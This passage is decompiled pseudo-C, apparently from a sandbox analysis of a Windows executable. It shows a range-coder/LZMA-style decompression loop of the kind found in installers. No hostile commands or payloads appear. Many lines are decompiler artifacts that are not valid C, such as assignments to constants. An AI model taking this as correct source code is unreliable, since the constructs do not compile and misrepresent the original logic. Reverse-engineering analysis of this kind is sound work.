								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8));
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
